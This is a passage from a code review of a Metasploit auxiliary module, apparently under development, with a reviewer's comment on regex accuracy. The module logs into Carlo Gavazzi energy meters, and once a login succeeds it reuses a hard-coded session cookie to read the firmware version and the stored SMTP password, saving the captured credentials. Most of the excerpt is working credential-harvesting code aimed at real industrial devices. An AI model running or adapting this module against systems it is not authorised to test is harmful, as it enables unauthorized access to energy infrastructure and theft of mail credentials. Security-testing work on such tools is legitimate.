modules/auxiliary/scanner/http/gavazzi_em_login_loot.rb

```diff
@@ -0,0 +1,260 @@
+              'Entra' => 'Sign+In' # Also - 'Entra' => 'Entra' # Seen to vary in some models
+            }
+        }
+      )
+
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
+      vprint_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+      return :abort
+    end
+
+    if (res && ((res.code == 200 && (res.body.include?('Login in progress') || res.body.include?('Login in corso')) && res.body.match(/id="error" value="2"/)) || (res.code == 302 && res.headers['Location'] == 'disclaimer.php')))
+      print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
+
+      # Extract firmware version
+      begin
+        res = send_request_cgi(
+          {
+            'uri' => '/setupfirmware.php',
+            'method' => 'GET',
+            'headers' => {
+              'Cookie' => 'PHPSESSID=xxe32qk2gbkfn3ur2nm7ypmgyp'
+            }
+          }
+        )
+      rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
+        vprint_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+        return :abort
+      end
+
+      if (res && res.code == 200 && res.body.include?('Firmware Version'))
+        fw_ver_dirty = res.body.match(/Firmware Version(.*)(.*)td/)
+        fw_ver_clean = "#{fw_ver_dirty}".match(/Ver. (.*)[$<]/)[1]
+        vprint_status("#{rhost}:#{rport} - Firmware version #{fw_ver_clean}...")
+
+        report_cred(
+          ip: rhost,
+          port: rport,
+          service_name: "Carlo Gavazzi Energy Meter [Firmware ver #{fw_ver_clean}]",
+          user: user,
+          password: pass
+        )
+      end
+
+      if (res && res.code == 200 && res.body.include?('Versione Firmware Installata'))
+        fw_ver_dirty = res.body.match(/Ver. (.*)[$<]/)
+        fw_ver_clean = "#{fw_ver_dirty}".match(/[^Ver. ](.*)[^<]/)
+        vprint_status("#{rhost}:#{rport} - Firmware version #{fw_ver_clean}...")
+
+        report_cred(
+          ip: rhost,
+          port: rport,
+          service_name: "Carlo Gavazzi Energy Meter [Firmware ver #{fw_ver_clean}]",
+          user: user,
+          password: pass
+        )
+      end
+
+      #
+      # Extract SMTP password
+      #
+
+      begin
+        res = send_request_cgi(
+          {
+            'uri'       => '/setupmail.php',
+            'method'    => 'GET',
+            'headers'   => {
+              'Cookie' => 'PHPSESSID=xxe32qk2gbkfn3ur2nm7ypmgyp'
+            }
+          }
+        )
+
+      rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
+        vprint_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+        return :abort
+      end
+
+      if (res && res.code == 200 && res.body.include?('SMTP'))
+        dirty_smtp_server = res.body.match(/smtp" value=(.*)[$=]/)[1]
```

Comment:
This first regex actualy hits on all 3 values you're trying to pull.  I'd either change it to be `id="smtp...` or if the length is 3, you can just do the 'clean' versions on the relative values from the first.